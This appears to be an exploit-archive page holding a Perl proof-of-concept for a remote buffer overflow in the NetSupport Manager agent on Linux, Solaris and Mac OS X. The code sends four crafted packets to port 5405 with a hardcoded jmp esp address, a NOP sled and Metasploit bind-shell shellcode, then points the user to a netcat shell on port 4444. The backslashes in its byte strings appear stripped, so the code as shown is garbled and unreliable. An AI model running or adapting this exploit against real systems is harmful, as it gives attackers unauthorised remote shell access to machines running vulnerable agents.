NetSupport Manager Agent Remote Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : NetSupport Manager Agent Remote Buffer Overflow
# Published : 2011-01-08
# Author : ikki
# Previous Title : KingView 6.5.3 SCADA HMI Heap Overflow PoC
# Next Title : ExtCalendar 2 (calendar.php) SQL Injection Vulnerability
#!/usr/bin/perl
#
# NetSupport Manager Agent Remote Buffer Overflow
# Product details: http://www.netsupportmanager.com/
#
# This vulnerability affects the following software:
#
# [Vulnerable] 
# NetSupport Manager for Linux v11.00 and likely all previous
# NetSupport Manager for Solaris v9.50 and likely all previous
# NetSupport Manager for Mac OS X v11.00 and likely all previous
#
# [Not Vulnerable]
# Netsupport Manager for Windows v11.00
#
# [Unknown]
# Netsupport Manager for Windows CE v11.00
# Netsupport Manager for Pocket PC v11.00
# NetSupport Manager for DOS v7.01
# Other products based on the same codebase (e.g. NetSupport School)
#
# This exploit has been tested against:
# - NetSupport Manager Linux agent v10.50.0
# - NetSupport Manager Linux agent v11.0.0
#
# As far as I know, this is still unpatched. 
#
# Credit: Luca Carettoni (@_ikki) 

use strict;
use warnings;
use IO::Socket;

my $host = shift || die "Usage: $0 host [port]n";
my $port = shift || 5405;
my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto => 'tcp') or die "error: $!n";

print "--[ NetSupport Manager Linux Agent Remote Buffer Overflow ]n";
print "--[ @_ikki 2010 ]nn";

#my $ret_address = 0x0808bd4f; #jmp esp /usr/nsm/daemon/clientdaemon v10.50.0
my $ret_address = 0x0808c4bf; #jmp esp /usr/nsm/daemon/clientdaemon v11.0.0
my $pad = 976;
my $nop = "x90" x 50;

# linux/x86/shell_bind_tcp - 217 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# AutoRunScript=, AppendExit=false, PrependChrootBreak=false, 
# PrependSetresuid=false, InitialAutoRunScript=, 
# PrependSetuid=false, LPORT=4444, RHOST=, 
# PrependSetreuid=false
my $shellcode = 
"x89xe0xdbxcbxd9x70xf4x59x49x49x49x49x49x49" .
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5a" .
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" .
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42" .
"x75x4ax49x46x51x49x4bx4cx37x4ax43x51x43x43" .
"x73x43x63x43x5ax44x42x4cx49x4bx51x48x30x51" .
"x76x4ax6dx4dx50x43x6bx51x4ex50x52x43x58x49" .
"x6fx47x72x47x61x51x4cx43x5ax42x30x42x71x46" .
"x30x4cx49x48x61x51x7ax45x36x46x38x48x4dx4d" .
"x50x4cx49x51x51x46x64x4dx63x46x64x4cx70x45" .
"x36x4ax6dx4bx30x51x53x4cx70x51x76x4ax6dx4b" .
"x30x4ex73x50x59x50x6ax47x4fx46x38x4ax6dx4b" .
"x30x47x39x43x49x49x68x50x68x46x4fx46x4fx42" .
"x53x45x38x51x78x46x4fx45x32x50x69x50x6ex4d" .
"x59x49x73x50x50x42x73x4bx39x49x71x4cx70x44" .
"x4bx48x4dx4dx50x41x41";


my $triggerA = "x15x00x5ax00".("x41" x 1024)."x00x00x00".
	 	"x00x00x00x00x00x00x00x00x00x00";

my $triggerB = "x25x00x51x00x81x41x41x41x41x41x41x00".
		"x41x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00x00x00x00x00x00x00x00x00x00".
		"x00x00x00";

my $triggerC = "x37x00x03x00x0ax00x00x00x00x00x58xb4".
		"x92xffx00x00x69x6bx6bx69x00x57x4fx52".
		"x4bx47x52x4fx55x50x00x3cx3e". #pleasure trail
		("A"x$pad).pack("V", $ret_address).$nop.$shellcode.
		"x00x00x31x32x2ex36x32x2ex31x2ex34x32".
		"x30x00x31x30x00x00";

my $triggerD = "x06x00x07x00x20x00x00x00x0ex00x32x00".
		"x01x10x18x00x00x01x9fx0dx00x00xe0x07".
		"x06x00x07x00x00x00x00x00x02x00x4ex00".
		"x02x00xacx00x04x00x7fx00x00x00";

print "Sending triggers...n";
$sock->send($triggerA);
sleep 1;
$sock->send($triggerB);
sleep 1;
$sock->send($triggerC);
sleep 1;
$sock->send($triggerD);
sleep 1;
$sock->close;
print "A shell is waiting: "nc ".$host." 4444"nn";